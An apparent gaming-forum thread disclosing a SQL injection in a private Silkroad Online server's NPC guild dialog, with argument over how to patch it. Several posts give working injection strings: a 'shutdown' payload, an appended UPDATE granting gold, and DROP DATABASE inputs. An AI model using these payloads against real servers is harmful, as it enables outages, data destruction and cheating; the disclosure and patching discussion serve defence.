[INFORMATION] SQL Injection (ingame)

Results 1 to 9 of 9
  1. #1
    Member Syloxx is offline
    MemberRank
    Aug 2014 Join Date
    GermanyLocation
    68Posts

    [INFORMATION] SQL Injection (ingame)

    Hello Ragezone,
    I just want to inform you that i discovered a new very harmful exploit.
    It is possible to execute a SQL Injection through the Fortresswar Administrator NPC with the "About Guild" dialog.

    example:
    Code:
     test' shutdown--
    this example will shutdown the sql server

    Screenshot:



  2. #2
    (⌐■_■) NourAyman is offline
    True MemberRank
    Feb 2012 Join Date
    Behind you :PLocation
    685Posts

    Re: [INFORMATION] SQL Injection (ingame)

    sounds like " welcome to hell " for the community lmao.

  3. #3
    Member PlayerSRO is offline
    MemberRank
    Jul 2012 Join Date
    72Posts

    Re: [INFORMATION] SQL Injection (ingame)

    nice exploit
    Last edited by PlayerSRO; 14-09-16 at 06:20 PM.

  4. #4
    Certified Database Admin Jangan is offline
    DeveloperRank
    Jul 2007 Join Date
    Amman, JordanLocation
    2,130Posts

    Re: [INFORMATION] SQL Injection (ingame)

    easy to patch - open the related stored procedure and modify it to be SQL inject proof. Then add checks and validators to make sure everything is run properly.

    You could also just remove the npc, but i do recommend that people learn how to counter SQL injects.
    I Do not answer PM or Skype!
    I Do not have/buy/sell server files!

    !~Contribute Back To The Community~!
    Please
    Rep and Like the author!

  5. #5
    Member Syloxx is offline
    MemberRank
    Aug 2014 Join Date
    GermanyLocation
    68Posts

    Re: [INFORMATION] SQL Injection (ingame)

    Quote Originally Posted by Jangan View Post
    easy to patch - open the related stored procedure and modify it to be SQL inject proof. Then add checks and validators to make sure everything is run properly.

    You could also just remove the npc, but i do recommend that people learn how to counter SQL injects.
    1st)
    The gameserver sends an update statement to the sql server that means there isn't anything to modify.

    2nd)
    Even if it would be a procedure it wont work lemme show you why. I use the _ADD_NEW_ITEM procedure as example (red = static by server / green = input by user)

    Normal:
    EXEC _ADD_NEW_ITEM 'Syloxx', 'ITEM_CH_TBLADE_01_C_RARE'

    Injection:
    EXEC _ADD_NEW_ITEM 'Syloxx', 'ITEM_CH_TBLADE_01_C_RARE' UPDATE _Char SET RemainGold = 999999999999 WHERE CharName16 = 'Syloxx'--'

    Injection (added formating to make it more clear):
    EXEC _ADD_NEW_ITEM 'Syloxx', '
    ITEM_CH_TBLADE_01_C_RARE'
    UPDATE _Char SET RemainGold = 999999999999 WHERE CharName16 = 'Syloxx'--
    '

    As you see, the server executed the procedure with a valid string and executes an update statement right after the procedure got executed.

    It is impossible to fix an sql injection inside the sql server, you have to fix the application or use an work around (packet filter for example)

    -Syloxx
    Last edited by Syloxx; 20-10-16 at 07:39 AM.


  6. #6
    Non omnis moriar UniverseGaming is offline
    True MemberRank
    May 2014 Join Date
    306Posts

    Re: [INFORMATION] SQL Injection (ingame)

    i do believe you are a moron because stored procedures dont accept querys only params so example say inside the stored proceedure u have a query that requires a username the program or script would called exec storedprocname and the params it needs and then runs the query with the data inside the sql server

  7. #7
    Member Syloxx is offline
    MemberRank
    Aug 2014 Join Date
    GermanyLocation
    68Posts

    Re: [INFORMATION] SQL Injection (ingame)

    Quote Originally Posted by UniverseGaming View Post
    i do believe you are a moron because stored procedures dont accept querys only params so example say inside the stored proceedure u have a query that requires a username the program or script would called exec storedprocname and the params it needs and then runs the query with the data inside the sql server
    @UniverseGaming looks like you are the moron...

    You close the string, give all required parameters and adds your query to it.

    I will write an example protecure with 3 parameters (string1 is set by the player through the message box and int1 and int2 is set by the server (example CharID and ItemID)

    Try to understand what the GameServer sends to the SQL Server and what does the SQL Server execute.

    In the solution spoiler you find the whole command with T-SQL highlights for better understanding. Please try to solve it by your self first.

    example call:
    exec _Procedure 'string1', int1, int2 (string1 = your input)

    input:
    string1', int1, int2; DROP DATABASE();--

    SOLUTION:
    Spoiler:
    Code:
    exec _Procedure 'string1', int1, int2; DROP DATABASE();--', int1, int2
    Last edited by Syloxx; 25-10-16 at 04:20 PM.


  8. #8
    Certified Database Admin Jangan is offline
    DeveloperRank
    Jul 2007 Join Date
    Amman, JordanLocation
    2,130Posts

    Re: [INFORMATION] SQL Injection (ingame)

    Oh dear...

    1) Relationship design.
    2) Tables design.
    3) Stored procedure design.

    Work on those 3 and you will never see sql injection in your life again.

    Everything you wrote can be stopped by properly re-writing the procedure, or altering the table, from being varchar(255)/varchar(max) to varchar(20/30) for example, and the game server should work fine. If not "since i havent touched sro in years", you can basically just modify the stored procedure.

    By your logic, i should be able to inject every single game made in life because there is no way to stop sql injection right?


    anyways -> Are stored procedures safe against SQL injection? - Paladion Networks ; How to prevent SQL Injection in Stored Procedures - CodeProject

    Have a great day :)
    I Do not answer PM or Skype!
    I Do not have/buy/sell server files!

    !~Contribute Back To The Community~!
    Please
    Rep and Like the author!

  9. #9
    Member Syloxx is offline
    MemberRank
    Aug 2014 Join Date
    GermanyLocation
    68Posts

    Re: [INFORMATION] SQL Injection (ingame)

    Quote Originally Posted by Jangan View Post
    Oh dear...

    1) Relationship design.
    2) Tables design.
    3) Stored procedure design.

    Work on those 3 and you will never see sql injection in your life again.

    Everything you wrote can be stopped by properly re-writing the procedure, or altering the table, from being varchar(255)/varchar(max) to varchar(20/30) for example, and the game server should work fine. If not "since i havent touched sro in years", you can basically just modify the stored procedure.

    By your logic, i should be able to inject every single game made in life because there is no way to stop sql injection right?


    anyways -> Are stored procedures safe against SQL injection? - Paladion Networks ; How to prevent SQL Injection in Stored Procedures - CodeProject

    Have a great day :)
    varchar limit:
    Spoiler:

    xxx'; DROP DATABASE() --varchar(3) is enough


    about stored procedure injection:
    Spoiler:

    i didn't read the blog but i am pretty sure all he talks about is that queries INSIDE the procedure can't be used for sql injection (the call itself can)


    about the "every game would be vulnerable"
    Spoiler:

    no, the job is that the application who sends the call command filters the stuff (remove the ' or escapes it etc)




    as you see, the sql procedure isn't invalid all you do is you add an additional query to that call.
    Last edited by Syloxx; 25-10-16 at 06:42 PM.




Advertisement